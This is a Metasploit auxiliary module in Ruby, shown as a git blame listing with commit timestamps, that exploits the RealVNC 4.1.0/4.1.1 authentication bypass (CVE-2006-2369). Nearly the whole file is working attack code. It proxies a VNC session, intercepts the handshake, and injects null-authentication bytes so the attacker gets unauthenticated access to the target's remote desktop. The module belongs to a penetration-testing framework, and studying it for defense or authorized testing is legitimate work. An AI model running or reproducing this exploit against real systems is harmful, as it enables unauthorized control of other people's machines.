2011-08-26 04:40:21 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-08-26 04:40:21 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'RealVNC NULL Authentication Mode Bypass',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an Authentication bypass Vulnerability
|
|
|
|
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
|
|
|
|
listener on LPORT and proxies to the target server
|
|
|
|
|
|
|
|
The AUTOVNC option requires that vncviewer be installed on
|
|
|
|
the attacking machine.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'hdm', #original msf2 module
|
|
|
|
'theLightCosine'
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['BID', '17978'],
|
2016-07-15 17:00:31 +00:00
|
|
|
['OSVDB', '25479'],
|
2013-08-30 21:28:54 +00:00
|
|
|
['URL', 'http://secunia.com/advisories/20107/'],
|
|
|
|
['CVE', '2006-2369'],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 15 2006'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),
|
|
|
|
OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),
|
|
|
|
OptBool.new('AUTOVNC', [true, "Automatically launch vncviewer from this host", false])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
# starts up the Listener Server
|
|
|
|
print_status("Starting listener...")
|
|
|
|
listener = Rex::Socket::TcpServer.create(
|
|
|
|
'LocalHost' => '0.0.0.0',
|
|
|
|
'LocalPort' => datastore['LPORT'],
|
|
|
|
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
|
|
|
|
)
|
|
|
|
|
|
|
|
# If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
|
|
|
|
# targetting the proxy listener.
|
|
|
|
if (datastore['AUTOVNC'])
|
|
|
|
unless (check_vncviewer())
|
|
|
|
print_error("The vncviewer does not appear to be installed, exiting...")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
print_status("Spawning viewer thread...")
|
|
|
|
view = framework.threads.spawn("VncViewerWrapper", false) {
|
|
|
|
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
# Establishes the connection between the viewier and the remote server
|
|
|
|
client = listener.accept
|
|
|
|
add_socket(client)
|
|
|
|
|
|
|
|
# Closes the listener socket as it is no longer needed
|
|
|
|
listener.close
|
|
|
|
|
|
|
|
s = connect
|
|
|
|
|
|
|
|
serverhello = s.get_once
|
|
|
|
unless serverhello.include? "RFB 003.008"
|
|
|
|
print_error("The server is not vulnerable")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# MitM attack on the VNC Authentication Process
|
|
|
|
client.puts(serverhello)
|
|
|
|
clienthello = client.get_once
|
|
|
|
s.puts(clienthello)
|
|
|
|
|
|
|
|
authmethods = s.read(2)
|
|
|
|
|
|
|
|
print_status("Auth methods received. Sending null authentication option to client")
|
|
|
|
client.write("\x01\x01")
|
|
|
|
client.read(1)
|
|
|
|
s.put("\x01")
|
|
|
|
s.read(4)
|
|
|
|
client.put("\x00\x00\x00\x00")
|
|
|
|
|
|
|
|
# Handles remaining proxy operations between the two sockets
|
|
|
|
closed = false
|
|
|
|
while(closed == false)
|
|
|
|
sockets =[]
|
|
|
|
sockets << client
|
|
|
|
sockets << s
|
|
|
|
selected = select(sockets,nil,nil,0)
|
|
|
|
#print_status ("Selected: #{selected.inspect}")
|
|
|
|
unless selected.nil?
|
|
|
|
|
|
|
|
if selected[0].include?(client)
|
|
|
|
begin
|
|
|
|
data = client.get_once
|
|
|
|
if data.nil?
|
|
|
|
print_error("Client closed connection")
|
|
|
|
closed = true
|
|
|
|
else
|
|
|
|
s.put(data)
|
|
|
|
end
|
|
|
|
rescue
|
|
|
|
print_error("Client closed connection")
|
|
|
|
closed = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if selected[0].include?(s)
|
|
|
|
begin
|
|
|
|
data = s.get_once
|
|
|
|
if data.nil?
|
|
|
|
print_error("Server closed connection")
|
|
|
|
closed = true
|
|
|
|
else
|
|
|
|
client.put(data)
|
|
|
|
end
|
|
|
|
rescue
|
|
|
|
closed = true
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Close sockets
|
|
|
|
s.close
|
|
|
|
client.close
|
|
|
|
|
|
|
|
if (datastore['AUTOVNC'])
|
|
|
|
view.kill rescue nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def check_vncviewer
|
|
|
|
vnc =
|
|
|
|
Rex::FileUtils::find_full_path('vncviewer') ||
|
|
|
|
Rex::FileUtils::find_full_path('vncviewer.exe')
|
|
|
|
if (vnc)
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
2011-08-26 04:40:21 +00:00
|
|
|
end
|